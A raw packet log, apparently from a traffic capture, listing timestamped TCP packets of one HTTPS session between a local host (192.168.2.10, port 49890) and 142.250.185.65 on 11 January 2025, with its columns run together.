                                                                                                                        Jan 11, 2025 00:41:13.987010002 CET49890443192.168.2.10142.250.185.65
                                                                                                                        Jan 11, 2025 00:41:13.987046003 CET44349890142.250.185.65192.168.2.10
                                                                                                                        Jan 11, 2025 00:41:13.987107992 CET49890443192.168.2.10142.250.185.65
                                                                                                                        Jan 11, 2025 00:41:13.987431049 CET49890443192.168.2.10142.250.185.65
                                                                                                                        Jan 11, 2025 00:41:13.987442017 CET44349890142.250.185.65192.168.2.10
                                                                                                                        Jan 11, 2025 00:41:14.625344992 CET44349890142.250.185.65192.168.2.10
                                                                                                                        Jan 11, 2025 00:41:14.625454903 CET49890443192.168.2.10142.250.185.65
                                                                                                                        Jan 11, 2025 00:41:14.629717112 CET49890443192.168.2.10142.250.185.65
                                                                                                                        Jan 11, 2025 00:41:14.629733086 CET44349890142.250.185.65192.168.2.10
                                                                                                                        Jan 11, 2025 00:41:14.629990101 CET44349890142.250.185.65192.168.2.10
                                                                                                                        Jan 11, 2025 00:41:14.630040884 CET49890443192.168.2.10142.250.185.65
                                                                                                                        Jan 11, 2025 00:41:14.630366087 CET49890443192.168.2.10142.250.185.65
                                                                                                                        Jan 11, 2025 00:41:14.675348043 CET44349890142.250.185.65192.168.2.10
                                                                                                                        Jan 11, 2025 00:41:17.377973080 CET44349890142.250.185.65192.168.2.10
                                                                                                                        Jan 11, 2025 00:41:17.378106117 CET49890443192.168.2.10142.250.185.65
                                                                                                                        Jan 11, 2025 00:41:17.384083986 CET44349890142.250.185.65192.168.2.10
                                                                                                                        Jan 11, 2025 00:41:17.384196997 CET49890443192.168.2.10142.250.185.65
                                                                                                                        Jan 11, 2025 00:41:17.396485090 CET44349890142.250.185.65192.168.2.10
                                                                                                                        Jan 11, 2025 00:41:17.396574020 CET49890443192.168.2.10142.250.185.65
                                                                                                                        Jan 11, 2025 00:41:17.396591902 CET44349890142.250.185.65192.168.2.10
                                                                                                                        Jan 11, 2025 00:41:17.396631002 CET49890443192.168.2.10142.250.185.65
                                                                                                                        Jan 11, 2025 00:41:17.402708054 CET44349890142.250.185.65192.168.2.10
                                                                                                                        Jan 11, 2025 00:41:17.402765989 CET49890443192.168.2.10142.250.185.65
                                                                                                                        Jan 11, 2025 00:41:17.464601040 CET44349890142.250.185.65192.168.2.10
                                                                                                                        Jan 11, 2025 00:41:17.464687109 CET49890443192.168.2.10142.250.185.65
                                                                                                                        Jan 11, 2025 00:41:17.464744091 CET44349890142.250.185.65192.168.2.10
                                                                                                                        Jan 11, 2025 00:41:17.464782953 CET49890443192.168.2.10142.250.185.65
                                                                                                                        Jan 11, 2025 00:41:17.464792013 CET44349890142.250.185.65192.168.2.10
                                                                                                                        Jan 11, 2025 00:41:17.464832067 CET49890443192.168.2.10142.250.185.65
                                                                                                                        Jan 11, 2025 00:41:17.466638088 CET44349890142.250.185.65192.168.2.10
                                                                                                                        Jan 11, 2025 00:41:17.466681004 CET49890443192.168.2.10142.250.185.65
                                                                                                                        Jan 11, 2025 00:41:17.466819048 CET44349890142.250.185.65192.168.2.10
                                                                                                                        Jan 11, 2025 00:41:17.466860056 CET49890443192.168.2.10142.250.185.65
                                                                                                                        Jan 11, 2025 00:41:17.472923994 CET44349890142.250.185.65192.168.2.10
                                                                                                                        Jan 11, 2025 00:41:17.472995043 CET49890443192.168.2.10142.250.185.65
                                                                                                                        Jan 11, 2025 00:41:17.473090887 CET44349890142.250.185.65192.168.2.10
                                                                                                                        Jan 11, 2025 00:41:17.473136902 CET49890443192.168.2.10142.250.185.65
                                                                                                                        Jan 11, 2025 00:41:17.479151011 CET44349890142.250.185.65192.168.2.10
                                                                                                                        Jan 11, 2025 00:41:17.479201078 CET49890443192.168.2.10142.250.185.65
                                                                                                                        Jan 11, 2025 00:41:17.479295015 CET44349890142.250.185.65192.168.2.10
                                                                                                                        Jan 11, 2025 00:41:17.479331017 CET49890443192.168.2.10142.250.185.65
                                                                                                                        Jan 11, 2025 00:41:17.488641977 CET44349890142.250.185.65192.168.2.10
                                                                                                                        Jan 11, 2025 00:41:17.488692045 CET49890443192.168.2.10142.250.185.65
                                                                                                                        Jan 11, 2025 00:41:17.488698959 CET44349890142.250.185.65192.168.2.10
                                                                                                                        Jan 11, 2025 00:41:17.488735914 CET49890443192.168.2.10142.250.185.65
                                                                                                                        Jan 11, 2025 00:41:17.496766090 CET44349890142.250.185.65192.168.2.10
                                                                                                                        Jan 11, 2025 00:41:17.496838093 CET49890443192.168.2.10142.250.185.65
                                                                                                                        Jan 11, 2025 00:41:17.496845961 CET44349890142.250.185.65192.168.2.10
                                                                                                                        Jan 11, 2025 00:41:17.496882915 CET49890443192.168.2.10142.250.185.65
                                                                                                                        Jan 11, 2025 00:41:17.498069048 CET44349890142.250.185.65192.168.2.10
                                                                                                                        Jan 11, 2025 00:41:17.498115063 CET49890443192.168.2.10142.250.185.65
                                                                                                                        Jan 11, 2025 00:41:17.498119116 CET44349890142.250.185.65192.168.2.10
                                                                                                                        Jan 11, 2025 00:41:17.498158932 CET49890443192.168.2.10142.250.185.65
                                                                                                                        Jan 11, 2025 00:41:17.504167080 CET44349890142.250.185.65192.168.2.10
                                                                                                                        Jan 11, 2025 00:41:17.504273891 CET49890443192.168.2.10142.250.185.65
                                                                                                                        Jan 11, 2025 00:41:17.504313946 CET44349890142.250.185.65192.168.2.10
                                                                                                                        Jan 11, 2025 00:41:17.504348993 CET49890443192.168.2.10142.250.185.65
                                                                                                                        Jan 11, 2025 00:41:17.509999037 CET44349890142.250.185.65192.168.2.10
                                                                                                                        Jan 11, 2025 00:41:17.510046005 CET49890443192.168.2.10142.250.185.65
                                                                                                                        Jan 11, 2025 00:41:17.510051966 CET44349890142.250.185.65192.168.2.10
                                                                                                                        Jan 11, 2025 00:41:17.510087967 CET49890443192.168.2.10142.250.185.65
                                                                                                                        Jan 11, 2025 00:41:17.515868902 CET44349890142.250.185.65192.168.2.10
                                                                                                                        Jan 11, 2025 00:41:17.515937090 CET49890443192.168.2.10142.250.185.65
                                                                                                                        Jan 11, 2025 00:41:17.515966892 CET44349890142.250.185.65192.168.2.10
                                                                                                                        Jan 11, 2025 00:41:17.516016960 CET49890443192.168.2.10142.250.185.65
                                                                                                                        Jan 11, 2025 00:41:17.521506071 CET44349890142.250.185.65192.168.2.10
                                                                                                                        Jan 11, 2025 00:41:17.521589041 CET49890443192.168.2.10142.250.185.65
                                                                                                                        Jan 11, 2025 00:41:17.521595955 CET44349890142.250.185.65192.168.2.10
                                                                                                                        Jan 11, 2025 00:41:17.521641970 CET49890443192.168.2.10142.250.185.65
                                                                                                                        Jan 11, 2025 00:41:17.527451992 CET44349890142.250.185.65192.168.2.10
                                                                                                                        Jan 11, 2025 00:41:17.527519941 CET49890443192.168.2.10142.250.185.65
                                                                                                                        Jan 11, 2025 00:41:17.530829906 CET44349890142.250.185.65192.168.2.10
                                                                                                                        Jan 11, 2025 00:41:17.530898094 CET49890443192.168.2.10142.250.185.65
                                                                                                                        Jan 11, 2025 00:41:17.533016920 CET44349890142.250.185.65192.168.2.10
                                                                                                                        Jan 11, 2025 00:41:17.533072948 CET49890443192.168.2.10142.250.185.65
                                                                                                                        Jan 11, 2025 00:41:17.551446915 CET44349890142.250.185.65192.168.2.10
                                                                                                                        Jan 11, 2025 00:41:17.551548958 CET44349890142.250.185.65192.168.2.10
                                                                                                                        Jan 11, 2025 00:41:17.551585913 CET44349890142.250.185.65192.168.2.10
                                                                                                                        Jan 11, 2025 00:41:17.551668882 CET49890443192.168.2.10142.250.185.65
                                                                                                                        Jan 11, 2025 00:41:17.551691055 CET44349890142.250.185.65192.168.2.10
                                                                                                                        Jan 11, 2025 00:41:17.551721096 CET49890443192.168.2.10142.250.185.65
                                                                                                                        Jan 11, 2025 00:41:17.551740885 CET49890443192.168.2.10142.250.185.65
                                                                                                                        Jan 11, 2025 00:41:17.552402020 CET44349890142.250.185.65192.168.2.10
                                                                                                                        Jan 11, 2025 00:41:17.552465916 CET49890443192.168.2.10142.250.185.65
                                                                                                                        Jan 11, 2025 00:41:17.552690029 CET44349890142.250.185.65192.168.2.10
                                                                                                                        Jan 11, 2025 00:41:17.552736044 CET49890443192.168.2.10142.250.185.65
                                                                                                                        Jan 11, 2025 00:41:17.553422928 CET44349890142.250.185.65192.168.2.10
                                                                                                                        Jan 11, 2025 00:41:17.553472996 CET49890443192.168.2.10142.250.185.65
                                                                                                                        Jan 11, 2025 00:41:17.558156967 CET44349890142.250.185.65192.168.2.10
                                                                                                                        Jan 11, 2025 00:41:17.558206081 CET44349890142.250.185.65192.168.2.10
                                                                                                                        Jan 11, 2025 00:41:17.558213949 CET49890443192.168.2.10142.250.185.65
                                                                                                                        Jan 11, 2025 00:41:17.558233976 CET44349890142.250.185.65192.168.2.10
                                                                                                                        Jan 11, 2025 00:41:17.558264017 CET49890443192.168.2.10142.250.185.65
                                                                                                                        Jan 11, 2025 00:41:17.558290005 CET49890443192.168.2.10142.250.185.65
                                                                                                                        Jan 11, 2025 00:41:17.563518047 CET44349890142.250.185.65192.168.2.10
                                                                                                                        Jan 11, 2025 00:41:17.563591957 CET49890443192.168.2.10142.250.185.65
                                                                                                                        Jan 11, 2025 00:41:17.563604116 CET44349890142.250.185.65192.168.2.10
                                                                                                                        Jan 11, 2025 00:41:17.563654900 CET49890443192.168.2.10142.250.185.65
                                                                                                                        Jan 11, 2025 00:41:17.568998098 CET44349890142.250.185.65192.168.2.10
                                                                                                                        Jan 11, 2025 00:41:17.569071054 CET49890443192.168.2.10142.250.185.65
                                                                                                                        Jan 11, 2025 00:41:17.569089890 CET44349890142.250.185.65192.168.2.10
                                                                                                                        Jan 11, 2025 00:41:17.569127083 CET49890443192.168.2.10142.250.185.65
                                                                                                                        Jan 11, 2025 00:41:17.573811054 CET44349890142.250.185.65192.168.2.10
                                                                                                                        Jan 11, 2025 00:41:17.573882103 CET49890443192.168.2.10142.250.185.65
                                                                                                                        Jan 11, 2025 00:41:17.573920012 CET44349890142.250.185.65192.168.2.10
                                                                                                                        Jan 11, 2025 00:41:17.573956013 CET49890443192.168.2.10142.250.185.65
                                                                                                                        Jan 11, 2025 00:41:17.578723907 CET44349890142.250.185.65192.168.2.10
                                                                                                                        Jan 11, 2025 00:41:17.578794003 CET49890443192.168.2.10142.250.185.65
                                                                                                                        Jan 11, 2025 00:41:17.578923941 CET44349890142.250.185.65192.168.2.10
                                                                                                                        Jan 11, 2025 00:41:17.578965902 CET49890443192.168.2.10142.250.185.65
                                                                                                                        Jan 11, 2025 00:41:17.583398104 CET44349890142.250.185.65192.168.2.10
                                                                                                                        Jan 11, 2025 00:41:17.583446980 CET49890443192.168.2.10142.250.185.65
                                                                                                                        Jan 11, 2025 00:41:17.583462000 CET44349890142.250.185.65192.168.2.10
                                                                                                                        Jan 11, 2025 00:41:17.583503962 CET49890443192.168.2.10142.250.185.65
                                                                                                                        Jan 11, 2025 00:41:17.588082075 CET44349890142.250.185.65192.168.2.10
                                                                                                                        Jan 11, 2025 00:41:17.588136911 CET49890443192.168.2.10142.250.185.65
                                                                                                                        Jan 11, 2025 00:41:17.588150024 CET44349890142.250.185.65192.168.2.10
                                                                                                                        Jan 11, 2025 00:41:17.588193893 CET49890443192.168.2.10142.250.185.65
                                                                                                                        Jan 11, 2025 00:41:17.593027115 CET44349890142.250.185.65192.168.2.10
                                                                                                                        Jan 11, 2025 00:41:17.593111038 CET49890443192.168.2.10142.250.185.65
                                                                                                                        Jan 11, 2025 00:41:17.593135118 CET44349890142.250.185.65192.168.2.10
                                                                                                                        Jan 11, 2025 00:41:17.593178988 CET49890443192.168.2.10142.250.185.65
                                                                                                                        Jan 11, 2025 00:41:17.600375891 CET44349890142.250.185.65192.168.2.10
                                                                                                                        Jan 11, 2025 00:41:17.600434065 CET49890443192.168.2.10142.250.185.65
                                                                                                                        Jan 11, 2025 00:41:17.600518942 CET44349890142.250.185.65192.168.2.10
                                                                                                                        Jan 11, 2025 00:41:17.600563049 CET49890443192.168.2.10142.250.185.65
                                                                                                                        Jan 11, 2025 00:41:17.609476089 CET44349890142.250.185.65192.168.2.10
                                                                                                                        Jan 11, 2025 00:41:17.609543085 CET49890443192.168.2.10142.250.185.65
                                                                                                                        Jan 11, 2025 00:41:17.609569073 CET44349890142.250.185.65192.168.2.10
                                                                                                                        Jan 11, 2025 00:41:17.609617949 CET49890443192.168.2.10142.250.185.65
                                                                                                                        Jan 11, 2025 00:41:17.615298033 CET44349890142.250.185.65192.168.2.10
                                                                                                                        Jan 11, 2025 00:41:17.615350962 CET49890443192.168.2.10142.250.185.65
                                                                                                                        Jan 11, 2025 00:41:17.615490913 CET44349890142.250.185.65192.168.2.10
                                                                                                                        Jan 11, 2025 00:41:17.615540028 CET49890443192.168.2.10142.250.185.65
                                                                                                                        Jan 11, 2025 00:41:17.621618032 CET44349890142.250.185.65192.168.2.10
                                                                                                                        Jan 11, 2025 00:41:17.621682882 CET49890443192.168.2.10142.250.185.65
                                                                                                                        Jan 11, 2025 00:41:17.621697903 CET44349890142.250.185.65192.168.2.10
                                                                                                                        Jan 11, 2025 00:41:17.621753931 CET49890443192.168.2.10142.250.185.65
                                                                                                                        Jan 11, 2025 00:41:17.625046968 CET44349890142.250.185.65192.168.2.10
                                                                                                                        Jan 11, 2025 00:41:17.625106096 CET49890443192.168.2.10142.250.185.65
                                                                                                                        Jan 11, 2025 00:41:17.625119925 CET44349890142.250.185.65192.168.2.10
                                                                                                                        Jan 11, 2025 00:41:17.625171900 CET49890443192.168.2.10142.250.185.65
                                                                                                                        Jan 11, 2025 00:41:17.625184059 CET44349890142.250.185.65192.168.2.10
                                                                                                                        Jan 11, 2025 00:41:17.625235081 CET49890443192.168.2.10142.250.185.65
                                                                                                                        Jan 11, 2025 00:41:17.625731945 CET44349890142.250.185.65192.168.2.10
                                                                                                                        Jan 11, 2025 00:41:17.625782013 CET49890443192.168.2.10142.250.185.65
                                                                                                                        Jan 11, 2025 00:41:17.625802994 CET44349890142.250.185.65192.168.2.10
                                                                                                                        Jan 11, 2025 00:41:17.625849962 CET49890443192.168.2.10142.250.185.65
                                                                                                                        Jan 11, 2025 00:41:17.626219034 CET44349890142.250.185.65192.168.2.10
                                                                                                                        Jan 11, 2025 00:41:17.626274109 CET49890443192.168.2.10142.250.185.65
                                                                                                                        Jan 11, 2025 00:41:17.626286983 CET44349890142.250.185.65192.168.2.10
                                                                                                                        Jan 11, 2025 00:41:17.626342058 CET49890443192.168.2.10142.250.185.65
                                                                                                                        Jan 11, 2025 00:41:17.626756907 CET44349890142.250.185.65192.168.2.10
                                                                                                                        Jan 11, 2025 00:41:17.626807928 CET49890443192.168.2.10142.250.185.65
                                                                                                                        Jan 11, 2025 00:41:17.627062082 CET44349890142.250.185.65192.168.2.10
                                                                                                                        Jan 11, 2025 00:41:17.627114058 CET49890443192.168.2.10142.250.185.65
                                                                                                                        Jan 11, 2025 00:41:17.630486012 CET44349890142.250.185.65192.168.2.10
                                                                                                                        Jan 11, 2025 00:41:17.630538940 CET49890443192.168.2.10142.250.185.65
                                                                                                                        Jan 11, 2025 00:41:17.630552053 CET44349890142.250.185.65192.168.2.10
                                                                                                                        Jan 11, 2025 00:41:17.630606890 CET49890443192.168.2.10142.250.185.65
                                                                                                                        Jan 11, 2025 00:41:17.634526968 CET44349890142.250.185.65192.168.2.10
                                                                                                                        Jan 11, 2025 00:41:17.634582996 CET49890443192.168.2.10142.250.185.65
                                                                                                                        Jan 11, 2025 00:41:17.634597063 CET44349890142.250.185.65192.168.2.10
                                                                                                                        Jan 11, 2025 00:41:17.634660006 CET49890443192.168.2.10142.250.185.65
                                                                                                                        Jan 11, 2025 00:41:17.641619921 CET44349890142.250.185.65192.168.2.10
                                                                                                                        Jan 11, 2025 00:41:17.641695976 CET49890443192.168.2.10142.250.185.65
                                                                                                                        Jan 11, 2025 00:41:17.641709089 CET44349890142.250.185.65192.168.2.10
                                                                                                                        Jan 11, 2025 00:41:17.641769886 CET49890443192.168.2.10142.250.185.65
                                                                                                                        Jan 11, 2025 00:41:17.651607037 CET44349890142.250.185.65192.168.2.10
                                                                                                                        Jan 11, 2025 00:41:17.651676893 CET49890443192.168.2.10142.250.185.65
                                                                                                                        Jan 11, 2025 00:41:17.651705027 CET44349890142.250.185.65192.168.2.10
                                                                                                                        Jan 11, 2025 00:41:17.651760101 CET49890443192.168.2.10142.250.185.65
                                                                                                                        Jan 11, 2025 00:41:17.655282021 CET44349890142.250.185.65192.168.2.10
                                                                                                                        Jan 11, 2025 00:41:17.655353069 CET49890443192.168.2.10142.250.185.65
                                                                                                                        Jan 11, 2025 00:41:17.655421019 CET44349890142.250.185.65192.168.2.10
                                                                                                                        Jan 11, 2025 00:41:17.655472994 CET49890443192.168.2.10142.250.185.65
                                                                                                                        Jan 11, 2025 00:41:17.657107115 CET44349890142.250.185.65192.168.2.10
                                                                                                                        Jan 11, 2025 00:41:17.657186985 CET49890443192.168.2.10142.250.185.65
                                                                                                                        Jan 11, 2025 00:41:17.657212019 CET44349890142.250.185.65192.168.2.10
                                                                                                                        Jan 11, 2025 00:41:17.657267094 CET49890443192.168.2.10142.250.185.65
                                                                                                                        Jan 11, 2025 00:41:17.658735991 CET44349890142.250.185.65192.168.2.10
                                                                                                                        Jan 11, 2025 00:41:17.658812046 CET49890443192.168.2.10142.250.185.65
                                                                                                                        Jan 11, 2025 00:41:17.658829927 CET44349890142.250.185.65192.168.2.10
                                                                                                                        Jan 11, 2025 00:41:17.658890009 CET49890443192.168.2.10142.250.185.65
                                                                                                                        Jan 11, 2025 00:41:17.659061909 CET44349890142.250.185.65192.168.2.10
                                                                                                                        Jan 11, 2025 00:41:17.659121037 CET49890443192.168.2.10142.250.185.65
                                                                                                                        Jan 11, 2025 00:41:17.659133911 CET44349890142.250.185.65192.168.2.10
                                                                                                                        Jan 11, 2025 00:41:17.659195900 CET49890443192.168.2.10142.250.185.65
                                                                                                                        Jan 11, 2025 00:41:17.659457922 CET44349890142.250.185.65192.168.2.10
                                                                                                                        Jan 11, 2025 00:41:17.659514904 CET49890443192.168.2.10142.250.185.65
                                                                                                                        Jan 11, 2025 00:41:17.659682035 CET44349890142.250.185.65192.168.2.10
                                                                                                                        Jan 11, 2025 00:41:17.659733057 CET49890443192.168.2.10142.250.185.65
                                                                                                                        Jan 11, 2025 00:41:17.659981966 CET44349890142.250.185.65192.168.2.10
                                                                                                                        Jan 11, 2025 00:41:17.660038948 CET49890443192.168.2.10142.250.185.65
                                                                                                                        Jan 11, 2025 00:41:17.660051107 CET44349890142.250.185.65192.168.2.10
                                                                                                                        Jan 11, 2025 00:41:17.660105944 CET49890443192.168.2.10142.250.185.65
                                                                                                                        Jan 11, 2025 00:41:17.660391092 CET44349890142.250.185.65192.168.2.10
                                                                                                                        Jan 11, 2025 00:41:17.660443068 CET49890443192.168.2.10142.250.185.65
                                                                                                                        Jan 11, 2025 00:41:17.660588980 CET44349890142.250.185.65192.168.2.10
                                                                                                                        Jan 11, 2025 00:41:17.660635948 CET49890443192.168.2.10142.250.185.65
                                                                                                                        Jan 11, 2025 00:41:17.660865068 CET44349890142.250.185.65192.168.2.10
                                                                                                                        Jan 11, 2025 00:41:17.660914898 CET49890443192.168.2.10142.250.185.65
                                                                                                                        Jan 11, 2025 00:41:17.661041975 CET44349890142.250.185.65192.168.2.10
                                                                                                                        Jan 11, 2025 00:41:17.661097050 CET49890443192.168.2.10142.250.185.65
                                                                                                                        Jan 11, 2025 00:41:17.661998034 CET44349890142.250.185.65192.168.2.10
                                                                                                                        Jan 11, 2025 00:41:17.662045002 CET49890443192.168.2.10142.250.185.65
                                                                                                                        Jan 11, 2025 00:41:17.662144899 CET44349890142.250.185.65192.168.2.10
                                                                                                                        Jan 11, 2025 00:41:17.662197113 CET49890443192.168.2.10142.250.185.65
                                                                                                                        Jan 11, 2025 00:41:17.664128065 CET44349890142.250.185.65192.168.2.10
                                                                                                                        Jan 11, 2025 00:41:17.664189100 CET49890443192.168.2.10142.250.185.65
                                                                                                                        Jan 11, 2025 00:41:17.664205074 CET44349890142.250.185.65192.168.2.10
                                                                                                                        Jan 11, 2025 00:41:17.664261103 CET49890443192.168.2.10142.250.185.65
                                                                                                                        Jan 11, 2025 00:41:17.666477919 CET44349890142.250.185.65192.168.2.10
                                                                                                                        Jan 11, 2025 00:41:17.666553974 CET49890443192.168.2.10142.250.185.65
                                                                                                                        Jan 11, 2025 00:41:17.666568995 CET44349890142.250.185.65192.168.2.10
                                                                                                                        Jan 11, 2025 00:41:17.666630983 CET49890443192.168.2.10142.250.185.65
                                                                                                                        Jan 11, 2025 00:41:17.668454885 CET44349890142.250.185.65192.168.2.10
                                                                                                                        Jan 11, 2025 00:41:17.668510914 CET49890443192.168.2.10142.250.185.65
                                                                                                                        Jan 11, 2025 00:41:17.668524981 CET44349890142.250.185.65192.168.2.10
                                                                                                                        Jan 11, 2025 00:41:17.668580055 CET49890443192.168.2.10142.250.185.65
                                                                                                                        Jan 11, 2025 00:41:17.670630932 CET44349890142.250.185.65192.168.2.10
                                                                                                                        Jan 11, 2025 00:41:17.670694113 CET49890443192.168.2.10142.250.185.65
                                                                                                                        Jan 11, 2025 00:41:17.670711040 CET44349890142.250.185.65192.168.2.10
                                                                                                                        Jan 11, 2025 00:41:17.670768976 CET49890443192.168.2.10142.250.185.65
                                                                                                                        Jan 11, 2025 00:41:17.672770023 CET44349890142.250.185.65192.168.2.10
                                                                                                                        Jan 11, 2025 00:41:17.672853947 CET49890443192.168.2.10142.250.185.65
                                                                                                                        Jan 11, 2025 00:41:17.672871113 CET44349890142.250.185.65192.168.2.10
                                                                                                                        Jan 11, 2025 00:41:17.672926903 CET49890443192.168.2.10142.250.185.65
                                                                                                                        Jan 11, 2025 00:41:17.674909115 CET44349890142.250.185.65192.168.2.10
                                                                                                                        Jan 11, 2025 00:41:17.674957991 CET49890443192.168.2.10142.250.185.65
                                                                                                                        Jan 11, 2025 00:41:17.674978971 CET44349890142.250.185.65192.168.2.10
                                                                                                                        Jan 11, 2025 00:41:17.675019979 CET49890443192.168.2.10142.250.185.65
                                                                                                                        Jan 11, 2025 00:41:17.677102089 CET44349890142.250.185.65192.168.2.10
                                                                                                                        Jan 11, 2025 00:41:17.677161932 CET49890443192.168.2.10142.250.185.65
                                                                                                                        Jan 11, 2025 00:41:17.677180052 CET44349890142.250.185.65192.168.2.10
                                                                                                                        Jan 11, 2025 00:41:17.677228928 CET49890443192.168.2.10142.250.185.65
                                                                                                                        Jan 11, 2025 00:41:17.679172039 CET44349890142.250.185.65192.168.2.10
                                                                                                                        Jan 11, 2025 00:41:17.679225922 CET49890443192.168.2.10142.250.185.65
                                                                                                                        Jan 11, 2025 00:41:17.679239035 CET44349890142.250.185.65192.168.2.10
                                                                                                                        Jan 11, 2025 00:41:17.679301023 CET49890443192.168.2.10142.250.185.65
                                                                                                                        Jan 11, 2025 00:41:17.681122065 CET44349890142.250.185.65192.168.2.10
                                                                                                                        Jan 11, 2025 00:41:17.681195021 CET49890443192.168.2.10142.250.185.65
                                                                                                                        Jan 11, 2025 00:41:17.681207895 CET44349890142.250.185.65192.168.2.10
                                                                                                                        Jan 11, 2025 00:41:17.681262016 CET49890443192.168.2.10142.250.185.65
                                                                                                                        Jan 11, 2025 00:41:17.683239937 CET44349890142.250.185.65192.168.2.10
                                                                                                                        Jan 11, 2025 00:41:17.683304071 CET49890443192.168.2.10142.250.185.65
                                                                                                                        Jan 11, 2025 00:41:17.683334112 CET44349890142.250.185.65192.168.2.10
                                                                                                                        Jan 11, 2025 00:41:17.683396101 CET49890443192.168.2.10142.250.185.65
                                                                                                                        Jan 11, 2025 00:41:17.685278893 CET44349890142.250.185.65192.168.2.10
                                                                                                                        Jan 11, 2025 00:41:17.685336113 CET49890443192.168.2.10142.250.185.65
                                                                                                                        Jan 11, 2025 00:41:17.685349941 CET44349890142.250.185.65192.168.2.10
                                                                                                                        Jan 11, 2025 00:41:17.685401917 CET49890443192.168.2.10142.250.185.65
                                                                                                                        Jan 11, 2025 00:41:17.687346935 CET44349890142.250.185.65192.168.2.10
                                                                                                                        Jan 11, 2025 00:41:17.687397957 CET49890443192.168.2.10142.250.185.65
                                                                                                                        Jan 11, 2025 00:41:17.687403917 CET44349890142.250.185.65192.168.2.10
                                                                                                                        Jan 11, 2025 00:41:17.687443972 CET49890443192.168.2.10142.250.185.65
                                                                                                                        Jan 11, 2025 00:41:17.689384937 CET44349890142.250.185.65192.168.2.10
                                                                                                                        Jan 11, 2025 00:41:17.689443111 CET49890443192.168.2.10142.250.185.65
                                                                                                                        Jan 11, 2025 00:41:17.689446926 CET44349890142.250.185.65192.168.2.10
                                                                                                                        Jan 11, 2025 00:41:17.689496994 CET49890443192.168.2.10142.250.185.65
                                                                                                                        Jan 11, 2025 00:41:17.689502001 CET44349890142.250.185.65192.168.2.10
                                                                                                                        Jan 11, 2025 00:41:17.689547062 CET49890443192.168.2.10142.250.185.65
                                                                                                                        Jan 11, 2025 00:41:17.696021080 CET44349890142.250.185.65192.168.2.10
                                                                                                                        Jan 11, 2025 00:41:17.696070910 CET44349890142.250.185.65192.168.2.10
                                                                                                                        Jan 11, 2025 00:41:17.696103096 CET49890443192.168.2.10142.250.185.65
                                                                                                                        Jan 11, 2025 00:41:17.696110010 CET44349890142.250.185.65192.168.2.10
                                                                                                                        Jan 11, 2025 00:41:17.696125984 CET49890443192.168.2.10142.250.185.65
                                                                                                                        Jan 11, 2025 00:41:17.696204901 CET49890443192.168.2.10142.250.185.65
                                                                                                                        Jan 11, 2025 00:41:17.696209908 CET44349890142.250.185.65192.168.2.10
                                                                                                                        Jan 11, 2025 00:41:17.696255922 CET49890443192.168.2.10142.250.185.65
                                                                                                                        Jan 11, 2025 00:41:17.702085972 CET44349890142.250.185.65192.168.2.10
                                                                                                                        Jan 11, 2025 00:41:17.702147961 CET49890443192.168.2.10142.250.185.65
                                                                                                                        Jan 11, 2025 00:41:17.702152967 CET44349890142.250.185.65192.168.2.10
                                                                                                                        Jan 11, 2025 00:41:17.702202082 CET49890443192.168.2.10142.250.185.65
                                                                                                                        Jan 11, 2025 00:41:17.702603102 CET44349890142.250.185.65192.168.2.10
                                                                                                                        Jan 11, 2025 00:41:17.702665091 CET49890443192.168.2.10142.250.185.65
                                                                                                                        Jan 11, 2025 00:41:17.702670097 CET44349890142.250.185.65192.168.2.10
                                                                                                                        Jan 11, 2025 00:41:17.702708006 CET49890443192.168.2.10142.250.185.65
                                                                                                                        Jan 11, 2025 00:41:17.708308935 CET44349890142.250.185.65192.168.2.10
                                                                                                                        Jan 11, 2025 00:41:17.708364010 CET49890443192.168.2.10142.250.185.65
                                                                                                                        Jan 11, 2025 00:41:17.708380938 CET44349890142.250.185.65192.168.2.10
                                                                                                                        Jan 11, 2025 00:41:17.708390951 CET44349890142.250.185.65192.168.2.10
                                                                                                                        Jan 11, 2025 00:41:17.708415985 CET49890443192.168.2.10142.250.185.65
                                                                                                                        Jan 11, 2025 00:41:17.708441973 CET49890443192.168.2.10142.250.185.65
                                                                                                                        Jan 11, 2025 00:41:17.708496094 CET44349890142.250.185.65192.168.2.10
                                                                                                                        Jan 11, 2025 00:41:17.708530903 CET49890443192.168.2.10142.250.185.65
                                                                                                                        Jan 11, 2025 00:41:17.712245941 CET44349890142.250.185.65192.168.2.10
                                                                                                                        Jan 11, 2025 00:41:17.712312937 CET49890443192.168.2.10142.250.185.65
                                                                                                                        Jan 11, 2025 00:41:17.712318897 CET44349890142.250.185.65192.168.2.10
                                                                                                                        Jan 11, 2025 00:41:17.712337017 CET44349890142.250.185.65192.168.2.10
                                                                                                                        Jan 11, 2025 00:41:17.712356091 CET49890443192.168.2.10142.250.185.65
                                                                                                                        Jan 11, 2025 00:41:17.712387085 CET49890443192.168.2.10142.250.185.65
                                                                                                                        Jan 11, 2025 00:41:17.712390900 CET44349890142.250.185.65192.168.2.10
                                                                                                                        Jan 11, 2025 00:41:17.712424040 CET49890443192.168.2.10142.250.185.65
                                                                                                                        Jan 11, 2025 00:41:17.713010073 CET44349890142.250.185.65192.168.2.10
                                                                                                                        Jan 11, 2025 00:41:17.713068008 CET49890443192.168.2.10142.250.185.65
                                                                                                                        Jan 11, 2025 00:41:17.713092089 CET44349890142.250.185.65192.168.2.10
                                                                                                                        Jan 11, 2025 00:41:17.713135004 CET49890443192.168.2.10142.250.185.65
                                                                                                                        Jan 11, 2025 00:41:17.714077950 CET44349890142.250.185.65192.168.2.10
                                                                                                                        Jan 11, 2025 00:41:17.714134932 CET49890443192.168.2.10142.250.185.65
                                                                                                                        Jan 11, 2025 00:41:17.714152098 CET44349890142.250.185.65192.168.2.10
                                                                                                                        Jan 11, 2025 00:41:17.714200020 CET49890443192.168.2.10142.250.185.65
                                                                                                                        Jan 11, 2025 00:41:17.715759993 CET44349890142.250.185.65192.168.2.10
                                                                                                                        Jan 11, 2025 00:41:17.715802908 CET49890443192.168.2.10142.250.185.65
                                                                                                                        Jan 11, 2025 00:41:17.715816975 CET44349890142.250.185.65192.168.2.10
                                                                                                                        Jan 11, 2025 00:41:17.715919971 CET49890443192.168.2.10142.250.185.65
                                                                                                                        Jan 11, 2025 00:41:17.717747927 CET44349890142.250.185.65192.168.2.10
                                                                                                                        Jan 11, 2025 00:41:17.717835903 CET49890443192.168.2.10142.250.185.65
                                                                                                                        Jan 11, 2025 00:41:17.717849970 CET44349890142.250.185.65192.168.2.10
                                                                                                                        Jan 11, 2025 00:41:17.717921972 CET49890443192.168.2.10142.250.185.65
                                                                                                                        Jan 11, 2025 00:41:17.719306946 CET44349890142.250.185.65192.168.2.10
                                                                                                                        Jan 11, 2025 00:41:17.719367981 CET49890443192.168.2.10142.250.185.65
